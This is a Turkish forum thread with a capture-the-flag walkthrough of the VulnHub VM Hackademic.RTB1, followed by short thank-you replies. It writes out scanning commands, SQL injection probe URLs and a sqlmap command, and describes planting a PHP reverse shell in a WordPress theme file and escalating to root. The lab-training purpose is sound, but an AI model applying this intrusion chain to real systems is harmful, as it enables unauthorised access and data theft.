THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Hackademic.RTB1 Çözümü

NAK0 - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
12/2015
Mesajlar:
51
Konular:
1
Teşekkür (Etti):
128
Teşekkür (Aldı):
31
Ticaret:
(0) %
8
1341
16-06-2020 21:01
#1
https://www.vulnhub.com/entry/hackademic-rtb1,17/

Bu uygulamada sql injection ve web shell örnekleri incelenmiştir. Wordpress üzerinde tarama yapılarak ilerlendikten sonra sql injection ile yetkili wordpress kullanıcısının bilgileri veri tabanından çekilerek login işleminden sonra nasıl web shell alınacağının uygulaması yapılmıştır. Son adımda root hakları elde edilmiştir.

İlk adımda IP adresi tespiti yapılarak port tarama işlemi gerçekleştirilmiştir.



Kod:
nmap -A -T5 -n 10.0.2.4


Çıktıdan da görülüceği üzere hedef işletim sistemi üzerinde SSH ve HTTP portları açıktır.
Nikto ile hızlı bir tarama aşağıdaki gibi yapılmıştır.
Kod:
nikto -h http://10.0.2.4


Nikto ile çok kayda değer bilgiler elde edilememiştir.
Web sitesi görüntülenerek girdi noktalarına bakılmıştır.Sayfanın kaynağı incelendiğinde hedefte wordpress kullanıldığı görülmüştür.



Wpscan aracı ile yapılan tarama sonucunda aşağıdaki açıklıklar tespit edilmiştir.

Kod:
wpscan --url http://10.0.2.4/Hackademic_RTB1/ --enumerate u




Aynı zamanda dizin keşfi yapılarak login sayfası belirlenmiştir.





Yukarıdaki analizden de görüleceği üzere hedef üzerinde potansiyel sql injection açıklığı vardır.

Siteyi biraz daha dolaşarak hedefe gönderilen postların olduğu sayfa görüntülendiğinde, GET parametresi ile girdi alan cat parametresi bulunmuştur.



Girdi noktasına uygulanan " ' " ile sql injection açıklık kontrolü yapılmıştır.Aşağıda da görüleceği üzere sayfa sql injection açıklığı barındırmaktadır.



Bu noktadan sonra manuel olarak aşağıdaki sorgularla sql injection yapılmıştır.

Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1'
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 1
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 2
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 3
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 4
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 5
Kod:
http://10.0.2.4/Hackademic_RTB1/?cat=1 order by 6
Aynı işlem sqlmap aracıyla otomatik olarak aşağıdaki gibi yapılmıştır.



İstek kaydedilerek sqlmap aracına verilmiştir.

Alıntı:
sqlmap -r/root/Desktop/injection.pcapng -p cat --dbms mysql --current-db


Aşağıdaki parametreler kullanılarak wp_user adlı tablo verileri çekilerek şifre özetleri kırılmıştır.



Veri tabanından elde edilen bilgiler ile GeorgeMiiler kullanıcısı ve q1w2e3 şifresi ile panalden giriş yapılmıştır.Giriş yapıldıktan sonra Presentation, theme editor sekmelerinden 404.php sayfası web shell kodlarıyla değiştirilmiştir.



php-reversehell.php içerisindeki kodlar 404.php ile değiştirilir.



Sayfa görüntülendiğinde nc ile açılan handler noktasından shell bağlantısı alınmıştır.

Kod:
http://10.0.2.4/Hackademic_RTB1/wp-content/themes/starburst/404.php


Lokalde yetki yükseltmek için uygun exploit araması yapıldığında rds exploitunun bu sistem için uygun olduğu görülmüştür.



Uygun exploit indirilerek hedefe HTTP ile transfer edilmiştir.





Linux kutuda yetki yükseltilerek root hakları elde edilmiş shell bağlantısı alınmıştır.
--------------------- "Ruhlarımız buluşur elbet Tanrı Dağı'nda"
Konu P4RS tarafından (16-06-2020 22:02 Saat 22:02 ) değiştirilmiştir.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
16-06-2020 22:02
#2
Ellerine sağlık NAK0
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
NAK0 Teşekkür etti.
osm4nl1evl4d1 - ait Kullanıcı Resmi (Avatar)
Tamamen Askıya Alındı
Üyelik tarihi:
03/2017
Nereden:
T Ü R K
Mesajlar:
4.783
Konular:
202
Teşekkür (Etti):
1128
Teşekkür (Aldı):
1667
Ticaret:
(0) %
16-06-2020 22:04
#3
Kalite akıyor. Yeni stajyerler fena.Eline sağlık
NAK0 Teşekkür etti.
Hê-ll - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
09/2018
Nereden:
Respect
Mesajlar:
2.534
Konular:
378
Teşekkür (Etti):
932
Teşekkür (Aldı):
786
Ticaret:
(0) %
16-06-2020 22:06
#4
Bunu görünce bir arkadaşla 2 saat boyunca çözmeye çalıştığımız makinalar geldi aklıma, bir türlü beceremedik elinize sağlık.
---------------------
PMYO
NAK0 Teşekkür etti.
Cold-Shadow - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
02/2015
Yaş:
23
Mesajlar:
3.425
Konular:
180
Teşekkür (Etti):
868
Teşekkür (Aldı):
1900
Ticaret:
(0) %
16-06-2020 22:06
#5
Ellerine sağlık
NAK0 Teşekkür etti.
NAK0 - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
12/2015
Mesajlar:
51
Konular:
1
Teşekkür (Etti):
128
Teşekkür (Aldı):
31
Ticaret:
(0) %
16-06-2020 22:08
#6
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık NAK0
Saolun hocam
--------------------- "Ruhlarımız buluşur elbet Tanrı Dağı'nda"
DarkS0LDIER - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
12/2019
Nereden:
Wyoming/Seul
Mesajlar:
841
Konular:
90
Teşekkür (Etti):
505
Teşekkür (Aldı):
1077
Ticaret:
(0) %
16-06-2020 22:17
#7
Eline sağlık
NAK0 Teşekkür etti.
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
16-06-2020 22:19
#8
Elinize sağlık
NAK0 Teşekkür etti.
Codx - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2017
Mesajlar:
310
Konular:
33
Ticaret:
(0) %
16-06-2020 22:41
#9
Ellerine sağlık
---------------------
Başarılarının toplamısın, başarızlıklarından arta kalanlar değil.



NAK0 Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler